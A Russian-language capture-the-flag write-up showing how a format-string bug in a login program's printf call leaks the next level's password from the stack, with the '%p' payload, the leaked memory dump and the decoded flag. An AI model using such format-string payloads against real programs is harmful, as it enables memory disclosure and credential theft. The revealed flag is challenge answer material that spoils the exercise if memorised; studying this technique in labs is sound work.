После просмотра псевдокода понятно, что открывается файл содержащий пароль
от следующего уровня и его содержимое сохраняется в поле.

Так же у нас есть 2 поля, отвечающие за введенные логин и пароль.
Сначала в памяти идет поле пароля, потом сразу же выделяется память для введенного логина.

Введенный пароль сравнивается с выгруженным из файла,
при удачном вводе, через printf отображается сообщение и введенное имя пользователя.
После чего происходит закрытие программы.

Если же пароль не совпадает, через printf выводится оповещение о неудаче и введенное имя пользователя.

Нам достаточно при вводе пользователя вывести множество значений по указателям, перед ними введя DDDD.

DDDD %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p
%p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p

В ответ мы получаем:

DDDD 0x7fffffffe4f0 (nil) 0x70 0x2a2a2a2a2a2a2a2a 0x2a2a2a2a2a2a2a2a 0x7fffffffe6e8 0x1f7ff9a08
0x2070252070252070 0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025207025207025
0x2520702520702520 0x2070252070252070 0x7025207025 (nil) (nil) (nil) (nil) 0x100000000 (nil)
0x756e505234376848 0x45414a3561733951 0x377a7143574e6758 0x354a35686e475873 0x48336750664b394d
(nil) 0x2070252044444444 0x7025207025207025 0x2520702520702520 0x2070252070252070  does not have access!

Нам требуется найти значение DDDD в памяти(44444444),
соседние ячейки памяти будут содержать значение поля с паролем.
Идем в обратном порядке т.к. биты читаются справа налево.

0x756e505234376848 0x45414a3561733951 0x377a7143574e6758 0x354a35686e475873 0x48336750664b394d

Эти значения ячеек и есть наш пароль.
Заходим на сайт http://crypt-online.ru/crypts/text2hex/ и вводим значения в обратном порядке.

Получаем: H3gPfK9M5J5hnGXs7zqCWNgXEAJ5as9QunPR47hH

Используем https://codebeautify.org/reverse-string для реверса строки
и получаем флаг для следующего уровня:

Hh74RPnuQ9sa5JAEXgNWCqz7sXGnh5J5M9KfPg3H